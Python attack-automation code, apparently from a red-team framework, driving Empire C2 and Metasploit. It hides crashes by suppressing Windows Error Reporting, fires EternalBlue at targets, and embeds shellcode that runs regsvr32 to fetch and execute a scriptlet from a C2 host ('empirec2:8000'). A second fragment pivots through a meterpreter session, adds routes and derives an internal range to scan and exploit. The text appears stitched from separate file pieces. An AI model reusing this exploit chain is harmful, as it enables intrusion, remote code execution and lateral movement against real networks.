return None # Suppress WER error UI to make it "silent" opts = { 'Agent': agent_name, 'command': """Set-ItemProperty -Path "Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" -Name DontShowUI -Value 1""" } results = API.agent_run_shell_cmd_with_result(agent_name, opts) # Fire EternalBlue from Empire which is basically the same Invoke-EternalBlue # will most likely crash remove target opts = exploitation.exploit_eternalblue.options target_ip = API.agent_info(agent_name)['agents'][0]['internal_ip'] param = { opts.required_agent: agent_name, opts.required_initialgrooms: 12, opts.required_maxattempts: 1, opts.required_shellcode: shellcode, opts.required_target: target_ip } API.module_exec(exploitation.exploit_eternalblue.path, param) return "launched externalblue! Pls wait for agent..." if __name__ == '__main__': # unit test API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD) # used msfvenom -p windows/x64/exec CMD="regsvr32... launcher.sct scrobj.dll" -f powershell # tried a larger shellcode that does powershell with base64 payload.. 
crashed target # nice integration will be to precede this technique with execution of metasploit msfvenom shellcode = "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x8d,0x8d,0x1,0x1,0x0,0x0,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5,0x72,0x65,0x67,0x73,0x76,0x72,0x33,0x32,0x2e,0x65,0x78,0x65,0x20,0x2f,0x73,0x20,0x2f,0x75,0x20,0x2f,0x6e,0x20,0x2f,0x69,0x3a,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x65,0x6d,0x70,0x69,0x72,0x65,0x63,0x32,0x3a,0x38,0x30,0x30,0x30,0x2f,0x6c,0x2e,0x73,0x63,0x74,0x20,0x73,0x63,0x72,0x6f,0x62,0x6a,0x2e,0x64,0x6c,0x6c,0x0" print(run(API, API.agents()['agents'][0]['name'], shellcode))
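2. Start MSF autoroute on pivot node
3. Do a vulnerable (to EternalBlue) target(s) scan
4. Launch EternalBlue thru pivot to adjacent target
5. Wait for Empire session from earlier step
"""
from c2_settings import *
from EmpireAPIWrapper import empireAPI
from pymetasploit.msfrpc import MsfRpcClient
from stage2.external_c2 import msf_wait_for_session, empire_wait_for_agent, msf_get_timestamp, empire_get_timestamp
from stage3.internal_reconn.windows import msf_eternalblue_scan
from stage3.internal_c2.windows import msf_autoroute
from stage3.escalate_privilege.windows import msf_eternal_blue

# Netmask that identifies the pivot's /24 route, and the host range inside it
# that gets scanned (1-254 takes a long time, so the lab range is narrowed).
PIVOT_NETMASK = '255.255.255.0'
PIVOT_SCAN_HOSTS = '.100-210'

# Set both API instances for MSF & Empire.
# NOTE(review): ssl=False means MSF_PWD (pulled in by the star import from
# c2_settings, together with the Empire credentials) goes to msfrpcd in
# cleartext - only acceptable on a trusted link; prefer enabling TLS.
msf_API = MsfRpcClient(MSF_PWD, server=MSF_SERVER, ssl=False)
empire_API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD)

# Step 1 - Wait for pivot (blocks until msf_wait_for_session returns a session id)
msf_session_id = msf_wait_for_session.run(msf_API)
t = msf_get_timestamp.run(msf_API, msf_session_id)
print(t + ' Got a meterpreter session ' + str(msf_session_id))

# Step 2 - Setup autoroute on pivot
pivot_range = ''
routes = msf_autoroute.run(msf_API, msf_session_id)
t = msf_get_timestamp.run(msf_API, msf_session_id)
# Same "<timestamp> <message>" layout as the Step 1 line.
print(t + ' Added route(s): ' + str(routes))
for r in routes:
    if PIVOT_NETMASK in r:
        # Assume 1 class C network in the test environment: turn the
        # "x.y.z.0/255.255.255.0" route into the "x.y.z.100-210" scan target.
        pivot_range = r.replace('.0/' + PIVOT_NETMASK, PIVOT_SCAN_HOSTS)
        break
if not pivot_range:
    # Without a /24 route the scan/exploit steps below would run against an
    # empty target spec; stop here with a clear message instead of silently
    # continuing.
    raise SystemExit(t + ' No ' + PIVOT_NETMASK + ' route found in ' + str(routes)
                     + '; cannot derive a pivot scan range')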